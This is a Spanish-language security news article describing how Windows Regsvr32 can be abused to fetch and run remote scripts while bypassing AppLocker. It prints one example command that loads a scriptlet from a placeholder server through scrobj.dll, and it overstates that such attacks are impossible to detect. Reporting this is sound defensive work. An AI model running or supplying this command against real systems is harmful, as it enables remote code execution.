Recientemente, un investigador de seguridad ha descubierto una vulnerabilidad en una herramienta de línea de comandos de Windows, Regsvr32, la cual puede permitir la descarga y ejecución de librerías y scripts de forma remota evadiendo todos los demás controles de seguridad.

Regsvr32 es una utilidad muy utilizada en instaladores o en series de comandos por lotes para registrar rápida y fácilmente librerías DLL en el sistema, sin embargo, esta herramienta no aporta ningún tipo de control ni está correctamente documentada ni limitada, lo que ha abierto la puerta a una serie de ataques informáticos en los que un atacante registra en el sistema librerías DLL desde fuentes externas (por ejemplo, desde una URL), e incluso scripts, con el fin de comprometer el sistema.

Un ejemplo de uso malintencionado de esta herramienta sería ejecutando:

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

Como hemos dicho, el primer problema que tiene esta herramienta es que no está correctamente documentada, por lo que nadie sabe muy bien cómo funciona ni cómo utilizarla de forma segura. Además, una incorrecta delimitación permite que se carguen scripts en JavaScript o VisualBasic desde el propio bloque de comandos en lote, así como tener acceso total a Internet tanto por HTTP como desde el proxy del sistema y es compatible con el tráfico cifrado TLS, por lo que un atacante puede alojar en un servidor remoto la librería maliciosa o el script y descargarlo en el sistema de forma totalmente oculta.

Por todo ello, los piratas informáticos pueden instalar de forma remota librerías en el sistema, las cuales puedan explotar para tomar el control del sistema con privilegios totales sobre el mismo, todo ello sin necesidad de tener permisos de administrador en el equipo.

Vulnerabilidad regsvr32

  • Estos ataques informáticos son imposibles de detectar y ni Windows ni AppLocker pueden bloquearlos
  • Tal como aseguran los expertos de seguridad, estos ataques son totalmente imposibles de detectar ya que, en teoría, es una función legítima y propia de Windows. Además, el atacante no necesita permisos de administrador para hacer uso de ella y, como hemos dicho, es capaz de ocultar su tráfico tras un proxy legítimo y usar tráfico cifrado para comunicarse con el servidor, aumentando así su peligrosidad.
  • Los usuarios que quieran analizar el funcionamiento de esta vulnerabilidad, pueden descargar la prueba de concepto desde GitHub.
  • Microsoft es consciente de esta vulnerabilidad y, probablemente, en alguno de los próximos boletines de seguridad de la compañía veamos una revisión de la misma que dota a los administradores de un mayor control sobre las librerías que se pueden o no se pueden importar al sistema, sin embargo, a día de hoy, sigue siendo una vulnerabilidad abierta y, lo peor de todo, conocida, por lo que debemos tener cuidado a la hora de instalar programas y ejecutar scripts en nuestro sistema Windows.

Fuente: subt0x10

Anuncios